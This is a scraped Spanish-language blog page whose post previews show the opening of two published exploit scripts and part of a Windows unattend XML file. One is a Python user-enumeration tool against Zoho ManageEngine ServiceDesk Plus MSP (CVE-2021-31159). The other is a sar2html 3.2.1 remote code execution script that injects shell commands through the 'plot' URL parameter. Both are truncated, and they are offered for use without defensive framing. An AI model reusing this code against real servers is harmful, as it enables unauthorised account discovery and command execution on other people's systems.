VIDEO DE PRESENTACION


Comentarios

Publicar un comentario

Entradas más populares de este blog

Imagen
  # Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration # Date: 17/06/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) # Vendor Homepage: https://www.manageengine.com # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 # Version: Previous to build 10519 # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 import argparse import requests import urllib3 urllib3 . disable_warnings ( urllib3 . exceptions . InsecureRequestWarning ) def get_args ( ) : parser = argparse . ArgumentParser ( ) parser . add_argument ( '-d' , '--domain' , required = True , action = 'store' , help = 'Domain to attack' ) ...
Leer más

windows usuario

  <?xml version="1.0" encoding="utf-8"?> <unattend xmlns="urn:schemas-microsoft-com:unattend"> <settings pass="oobeSystem"> <component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <Reseal> <Mode>OOBE</Mode> </Reseal> </component> <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <OOBE> <HideO...
Leer más
Imagen
  # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Ubuntu 18.04.1 #!/usr/bin/env python3 import requests import re from cmd import Cmd url = input ( "Enter The url => " ) class Terminal ( Cmd ) : prompt = "Command => " def default ( self , args ) : exploiter ( args ) def exploiter ( cmd ) : global url sess = requests . session ( ) output = sess . get ( f "{url}/index.php?plot=;{cmd}" ) try : out = re . findall ( "<option value=(.*?)>" , output . text ) except : print ( "Error!!" ) for ouut in out : if "There is no defined host..." not in ouut : if "null selected" not i...
Leer más